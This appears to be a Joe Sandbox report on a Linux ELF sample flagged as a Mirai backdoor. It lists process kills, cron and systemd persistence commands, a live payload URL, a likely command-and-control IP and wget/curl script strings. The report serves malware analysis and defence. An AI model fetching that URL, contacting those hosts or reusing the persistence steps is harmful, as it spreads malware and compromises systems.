Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g5.elf

Overview

General Information

Sample name:g5.elf
Analysis ID:1589779
MD5:0947b8ef749b4f928c2050559d7e734c
SHA1:1e37a3067e6131106f6d4ae4f98fcc0cd8c6fe8e
SHA256:9e9bca63d6c89ee16f353e391e0f8208ecd7e1e98e19672c35f6aa4c8d395738
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589779
Start date and time:2025-01-13 06:41:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g5.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g5
Command:/tmp/g5.elf
PID:6214
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g5.elf (PID: 6214, Parent: 6130, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g5.elf
    • g5.elf New Fork (PID: 6225, Parent: 6214)
    • sh (PID: 6225, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6231, Parent: 6225)
      • systemctl (PID: 6231, Parent: 6225, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g5.elf New Fork (PID: 6243, Parent: 6214)
    • sh (PID: 6243, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 6245, Parent: 6243)
      • systemctl (PID: 6245, Parent: 6243, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g5.elf New Fork (PID: 6246, Parent: 6214)
    • sh (PID: 6246, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 6251, Parent: 6246)
      • crontab (PID: 6251, Parent: 6246, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g5.elf New Fork (PID: 6252, Parent: 6214)
    • sh (PID: 6252, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 6257, Parent: 6252)
    • g5.elf New Fork (PID: 6258, Parent: 6214)
      • g5.elf New Fork (PID: 6260, Parent: 6258)
        • g5.elf New Fork (PID: 6263, Parent: 6260)
        • g5.elf New Fork (PID: 6264, Parent: 6260)
        • g5.elf New Fork (PID: 6267, Parent: 6260)
  • wrapper-2.0 (PID: 6216, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6217, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6218, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6219, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6220, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6221, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6233, Parent: 6232)
  • snapd-env-generator (PID: 6233, Parent: 6232, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g5.elfReversingLabs: Detection: 39%
Source: global trafficTCP traffic: 192.168.2.23:48820 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.23:35687 -> 1.1.1.1:53
Source: /tmp/g5.elf (PID: 6214)Socket: 127.0.0.1:23476Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g5.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr, hello.12.dr, tmp.YK4hXT.40.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/g5
Source: g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6216, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6217, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6218, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6219, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6220, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6221, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6216, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6217, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6218, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6219, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6220, result: successfulJump to behavior
Source: /tmp/g5.elf (PID: 6214)SIGKILL sent: pid: 6221, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6251)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 6251)File: /var/spool/cron/crontabs/tmp.YK4hXTJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6235/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6235/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6235/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6235/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6193/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6193/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6193/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6193/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6194/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6194/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6194/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/6194/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/g5.elf (PID: 6225)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 6243)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 6246)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g5.elf (PID: 6252)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 6231)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6245)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g5.elf (PID: 6214)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g5.elf (PID: 6214)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g5.elf (PID: 6214)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g5.elf (PID: 6214)Queries kernel information via 'uname': Jump to behavior
Source: g5.elf, 6214.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmpBinary or memory string: /tmp/qemu-open.EENzh3
Source: g5.elf, 6214.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmp, g5.elf, 6258.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmpBinary or memory string: 9x86_64/usr/bin/qemu-arm/tmp/g5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g5.elf
Source: g5.elf, 6214.1.00005566e81c5000.00005566e8316000.rw-.sdmp, g5.elf, 6258.1.00005566e81c5000.00005566e8316000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g5.elf, 6214.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmpBinary or memory string: fU/tmp/qemu-open.EENzh3:%X
Source: g5.elf, 6214.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmp, g5.elf, 6258.1.00007ffdaf951000.00007ffdaf972000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g5.elf, 6214.1.00005566e81c5000.00005566e8316000.rw-.sdmp, g5.elf, 6258.1.00005566e81c5000.00005566e8316000.rw-.sdmpBinary or memory string: fU!/etc/qemu-binfmt/arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589779 Sample: g5.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 1.1.1.1, 35687, 53 CLOUDFLARENETUS Australia 2->53 55 3 other IPs or domains 2->55 57 Multi AV Scanner detection for submitted file 2->57 9 g5.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 59 Sample tries to kill multiple processes (SIGKILL) 9->59 61 Drops files in suspicious directories 9->61 19 g5.elf sh 9->19         started        21 g5.elf sh 9->21         started        23 g5.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g5.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.YK4hXT, troff 27->49 dropped 63 Sample tries to persist itself using cron 27->63 65 Executes the "crontab" command typically for achieving persistence 27->65 39 g5.elf 35->39         started        41 g5.elf 35->41         started        43 g5.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g5.elf39%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g5100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://103.136.41.100/g5hello.service.12.dr, hello.12.dr, tmp.YK4hXT.40.dr, crontab.tmp.12.drfalse
  • Avira URL Cloud: malware
unknown
http://%d.%d.%d.%d/%sg5.elffalse
    high
    http://1/wget.shg5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpfalse
      high
      http://schemas.xmlsoap.org/soap/encoding/g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpfalse
        high
        http://9/curl.shg5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g5.elf, 6214.1.00007f827c033000.00007f827c039000.rw-.sdmp, g5.elf, 6258.1.00007f827c033000.00007f827c039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            77.90.22.16
            unknownGermany
            12586ASGHOSTNETDEfalse
            1.1.1.1
            unknownAustralia
            13335CLOUDFLARENETUSfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            77.90.22.16g4.elfGet hashmaliciousUnknownBrowse
              g6.elfGet hashmaliciousUnknownBrowse
                g3.elfGet hashmaliciousUnknownBrowse
                  m1.elfGet hashmaliciousUnknownBrowse
                    m5.elfGet hashmaliciousUnknownBrowse
                      m2.elfGet hashmaliciousUnknownBrowse
                        1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                        • 1.1.1.1:8080/
                        6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                        • 1.1.1.1/ctrl/playback.php
                        PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                        • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                        AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                        • 1.1.1.1/
                        INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                        • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                        Go.exeGet hashmaliciousUnknownBrowse
                        • 1.1.1.1/
                        109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                        • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                        No context
